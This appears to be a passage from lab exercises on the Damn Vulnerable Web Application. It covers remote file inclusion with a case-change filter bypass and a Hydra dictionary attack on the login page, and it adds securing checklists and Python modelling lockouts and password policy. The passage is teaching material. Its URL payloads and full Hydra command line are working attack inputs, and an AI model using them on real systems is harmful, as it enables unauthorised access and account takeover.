Now, let's try to exploit this vulnerability using remote files hosted on the attacker's
machine.

Difficulty: LOW

Let's start with the low difficulty.

Change the difficulty to low and go to file inclusion tab.

Let's change include.php to http://www.google.com so the final URL will look
something like this:

?page=http://www.google.com

Difficulty: MEDIUM

Change the difficulty to medium and check as we did in the low difficulty. You'll
notice it's not working anymore: the target is now filtering "http" and "https", as
shown in the source page. So try the attack with "HTTP" (in caps), or with any single
letter in caps like the "httP" I used in the snapshot, and it will work, because the
filter only matches the lowercase strings.

?page=httP://imdb.com

Difficulty: HIGH

We can't exploit the high difficulty using RFI. As you can see in the source page, the
target web server only accepts "include.php" or anything starting with the word
"file", which is why we can't include anything from an outside server.

Points to Secure against File Inclusion Vulnerability

a) Strong Input Validation.

b) A whitelist of acceptable inputs.

c) Reject any inputs that do not strictly conform to specifications.

d) For filenames, use a stringent whitelist that limits the character set that can be used.

e) Exclude directory separators such as “/”.

f) Use a whitelist of allowable file extensions.

g) Environment Hardening.

h) Develop and run your code in the most recent versions of PHP available.

i) Configure your PHP applications so that they do not use register_globals.

j) Run your code using the lowest privileges.
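As an added illustration (not code from this page or from DVWA itself), the following Python models the three filters as this page describes them, next to a resolver that applies the checklist above: a whitelist of pages and extensions, no directory separators or URI schemes, and a realpath containment check. The web root and the page whitelist are constructed assumptions.

```python
import os
import re

# Filters modeled on this page's description of DVWA's difficulty levels
# (an assumption for illustration; not DVWA's own source code).
def filter_low(page):
    return page                                   # no filtering at all

def filter_medium(page):
    # strips traversal and scheme fragments, but only these exact lowercase
    # substrings, so "/etc/passwd" and "httP://" pass straight through
    for bad in ("../", "..\\", "http://", "https://"):
        page = page.replace(bad, "")
    return page

def filter_high(page):
    # accepts only "include.php" or names starting with "file", which still
    # lets the "file:///etc/passwd" URI through
    return page if page == "include.php" or page.startswith("file") else None

# Hardened resolver following the checklist above: whitelist of pages and
# extensions, no separators or schemes, and a realpath containment check.
WEB_ROOT = os.path.realpath("/var/www/dvwa/vulnerabilities/fi")  # constructed path
ALLOWED_PAGES = {"include.php", "file1.php"}                     # constructed whitelist
ALLOWED_EXT = {".php"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_]+\.[A-Za-z0-9]+")           # no "/", "\", ":", ".."

def resolve_secure(page):
    """Return the absolute path to include, or None if the input is rejected."""
    if not SAFE_NAME.fullmatch(page):
        return None
    if os.path.splitext(page)[1] not in ALLOWED_EXT or page not in ALLOWED_PAGES:
        return None
    full = os.path.realpath(os.path.join(WEB_ROOT, page))
    if os.path.commonpath([WEB_ROOT, full]) != WEB_ROOT:
        return None                               # escaped the web root
    return full

# The inputs this page walks through, as constructed test data.
PAGE_INPUTS = ["include.php", "../../../../../../etc/passwd", "/etc/passwd",
               "file:///etc/passwd", "http://www.google.com", "httP://imdb.com"]

def compare():
    """For each input: what low, medium, high and the hardened resolver would include."""
    return {p: (filter_low(p), filter_medium(p), filter_high(p), resolve_secure(p))
            for p in PAGE_INPUTS}

if __name__ == "__main__":
    for page, outcome in compare().items():
        print(f"{page:32} -> {outcome}")
```

Running it shows every page input passing at least one of the weak filters while only "include.php" survives the hardened resolver.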


Experiment-10
Object: - Brute-Force and Dictionary Attacks: Use DVWA to simulate
login pages and demonstrate brute-force and dictionary attacks against
weak passwords. Emphasize the importance of strong password
policies.

DVWA: Brute Force


Modern brute force attacks can now easily crack an 8-character alphanumeric
password in a mere 2 hours, while more advanced password hashes can be
cracked in a few months. This is achieved by performing an exhaustive key
search, in which the computer tries every possible combination of every
possible character in order to find the combination that is the password. For
the purpose of this demonstration, I will be setting up the Damn Vulnerable
Web Application (DVWA) to simulate a brute force attack.

The attack will use Hydra, a parallelized login cracker, with the 'rockyou.txt'
wordlist against the login form below.

Initially, barely any information was disclosed. However, a reasonable first guess is
one of the most popular usernames on any web application, "admin".

Before proceeding with the attack, we must first collect more information. Open the
Burp Suite browser and direct it to the DVWA page, which will look exactly like the
one in a regular browser. Now, try logging in using a random password. For this
attempt, the username "admin" and the password "admin123" were used. For Burp
Suite to capture the request, turn on Intercept mode right before clicking
the "Login" button.

As expected, the credentials entered were wrong, and an error message was displayed
saying, "Username and/or password incorrect". Now, head back to Burp Suite and
view the raw data of the connection request.

Through this, we have gathered more information that may be useful (e.g., the
session cookie and the parameters of the request). The following table includes all the
gathered information:
The next step is to use Hydra to crack the account password. There is no fixed
format to Hydra’s command as it will depend on the elements and/or information
known to the pentester (e.g., username, hostname, URL service, and cookies).
Considering the list of disclosed information and available parameters obtained
during the vulnerability assessment step utilizing Burp Suite, the command used
for this demonstration will be:

hydra 127.0.0.1 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form \
"/dvwa/vulnerabilities/brute:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=9cei1q7s10h39gdp538to6f3ut;security=low:F=Username and/or password incorrect."

With all the elements and components listed in the table incorporated, Hydra will
systematically attempt the passwords from the 'rockyou.txt' wordlist in an attempt
to crack the password for the "admin" account.

The result of the attack reveals the password to be "password", and the login
succeeds, concluding the demonstration.

The demonstrated attack shows how easily malicious actors can breach accounts
with weak passwords. Therefore, it is always important to set a password that
complies with a standard strong password policy, or instead to use a more robust
passphrase.
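As an added example (not code from this page, DVWA or Hydra), the following Python models a DVWA-style login handler and replays the dictionary attack above against it, once with no lockout as at DVWA's low level and once with a failed-attempt lockout, and adds the kind of password-policy check the conclusion calls for. The account, the six-word stand-in for rockyou.txt and the lockout thresholds are constructed assumptions.

```python
import time

# A DVWA-style login modeled on this page (an assumption; not DVWA's code):
# one account "admin"/"password", and no lockout when max_fail is None,
# which reproduces the "low" security level that Hydra runs against.
USERS = {"admin": "password"}

class Login:
    def __init__(self, max_fail=None, lock_seconds=900):
        self.max_fail, self.lock_seconds = max_fail, lock_seconds
        self.failures = {}        # username -> [failed count, last failure time]

    def attempt(self, user, password, now=None):
        """Return 'ok', 'locked', or DVWA's error text."""
        now = time.time() if now is None else now
        count, last = self.failures.get(user, [0, 0.0])
        if self.max_fail is not None and count >= self.max_fail \
                and now - last < self.lock_seconds:
            return "locked"       # refuse to answer until the window expires
        if USERS.get(user) == password:
            self.failures.pop(user, None)
            return "ok"
        self.failures[user] = [count + 1, now]
        return "Username and/or password incorrect."

# Constructed stand-in for rockyou.txt (the real list has millions of entries).
WORDLIST = ["123456", "12345", "123456789", "password", "iloveyou", "princess"]

def dictionary_attack(handler, user, wordlist):
    """Replay what Hydra does against the handler; return (found, attempts)."""
    for n, word in enumerate(wordlist, 1):
        result = handler.attempt(user, word, now=1000.0 + n)  # one try per second
        if result == "ok":
            return word, n
        if result == "locked":
            return None, n
    return None, len(wordlist)

def is_strong(password, min_len=12):
    """Policy check: length, three character classes, and not a wordlist entry."""
    classes = sum(any(f(c) for c in password) for f in
                  (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum()))
    return len(password) >= min_len and classes >= 3 and password.lower() not in WORDLIST

if __name__ == "__main__":
    print(dictionary_attack(Login(), "admin", WORDLIST))            # ('password', 4)
    print(dictionary_attack(Login(max_fail=3), "admin", WORDLIST))  # (None, 4)
    print(is_strong("password"), is_strong("Correct-Horse9Battery"))  # False True
```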
